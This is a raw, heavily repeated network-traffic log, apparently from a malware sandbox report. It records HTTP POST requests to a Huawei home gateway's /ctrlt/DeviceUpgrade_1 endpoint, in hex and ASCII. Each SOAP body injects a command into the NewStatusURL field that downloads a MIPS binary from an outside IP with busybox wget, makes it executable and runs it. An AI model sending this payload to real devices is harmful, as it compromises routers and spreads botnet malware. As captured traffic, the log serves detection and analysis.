69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
